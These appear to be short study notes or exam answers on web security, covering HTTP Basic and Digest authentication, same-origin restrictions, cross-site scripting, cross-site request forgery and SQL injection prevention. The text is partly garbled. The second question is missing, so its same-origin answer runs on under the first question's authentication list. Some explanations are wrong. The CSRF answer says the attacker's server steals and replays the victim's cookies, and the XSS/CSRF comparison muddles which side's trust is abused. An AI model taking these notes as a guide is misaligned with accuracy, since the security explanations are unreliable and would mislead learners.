1. Describe the two authentication modes that HTTP supports.
HTTP supports the following two authentication modes:
- Basic authentication:
- login/password based.
- Information is sent unencrypted.
- credentials sent on every request.
- Supported by nearly all server/clients and thus widely used.
- Digest authentication:
- Server sends nonce.
- Client hashes nonce based on login/password.
- Client sends only cryptographic hash over the net.
- Seldom used.
- It prevents a hostile script from tampering with other pages in a browser.
- It prevents a script from snooping on input in other windows.
- It verifies URLs of the target document and script that access the resource.
- Its checks are very restrictive, everything must match.
3. Describe how cross-site scripting attacks work in detail.
The core of a traditional XSS attacks lies a vulnerable script on a vulnerable site. The script will read input and echo it back to unsuspecting users without first sanitizing it.
4. Describe how cross-site request forgery attacks work in detail.
The cross-site request forgery attack describes an attack where the server cannot trust the users (requests). If a user that has visited a malicious website and had their cookies stolen, the malicious server may send requests to the good server authenticated with the victim’s cookie.
5. What are the differences between cross-site scripting and cross-site request forgery.
The cross-site request forgery attack describes one where the server doesn’t trust the user. The cross-site scripting attack is where a client doesn’t trust the server.
6. Describe the main characteristics of SQL injection and give 2 ways in which they can be prevented.
- Browser sends malicious input to server.
- Bad input validation and sanitisation on server leads to malicious SQL query.
Two ways in which they can be prevented are:
- Using generated sql queries with parameters.
- Validating and sanitising input.